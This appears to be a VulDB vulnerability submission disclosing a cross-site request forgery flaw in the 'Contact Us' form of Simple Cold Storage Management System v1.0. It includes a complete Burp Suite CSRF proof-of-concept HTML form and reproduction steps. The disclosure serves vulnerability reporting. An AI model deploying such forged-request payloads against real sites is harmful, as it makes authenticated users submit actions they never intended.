Submit #49111: Simple Cold Storage Management System - CSRF in Contact Us forminfo

TitleSimple Cold Storage Management System - CSRF in Contact Us form
Description# Exploit Title: Simple Cold Storage Management System v1.0 - CSRF in "Contact Us" # Exploit Author: Sourav Kumar # Vendor Name: oretnom23 # Vendor Homepage: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html # Software Link: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html # Version: v1.0 # Tested on: Windows 11, Apache Description:It is an attack that forces authenticated users to submit a request to a Web application against which they are currently authenticated. CSRF attacks exploit the trust a Web application has in an authenticated user. Vulnerable Parameters: Contact Us Payload: ' <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/csms/classes/Master.php?f=save_message" method="POST" enctype="multipart/form-data"> <input type="hidden" name="id" value="" /> <input type="hidden" name="fullname" value="as" /> <input type="hidden" name="contact" value="885665" /> <input type="hidden" name="email" value="kittukumar267&#64;gmail&#46;com" /> <input type="hidden" name="message" value="seht" /> <input type="submit" value="Submit request" /> </form> </body> </html> Steps: 1) Go to Contact us page - http://localhost/csms/?page=contact_us 2) Now fill the form 3) Now intercept the post request with burp suite 4) Then Generate CSRF Payload PoC 5) Open the HTML Payload in browser 6) You will receive this message {"status":"success","msg":"Your message has successfully sent."}
Source⚠️ https://github.com/souravkr529/CSRF-in-Cold-Storage-Management-System/blob/main/PoC
User
 Sourav529 (UID 33985)
Submission10/18/2022 11:14 (4 years ago)
Moderation10/18/2022 11:42 (28 minutes later)
StatusAccepted
VulDB entry211194 [SourceCodester Simple Cold Storage Management System 1.0 Contact Us /csms/?page=contact_us cross-site request forgery]
Points20

PreviousOverviewNext

Interested in the pricing of exploits?

See the underground prices here!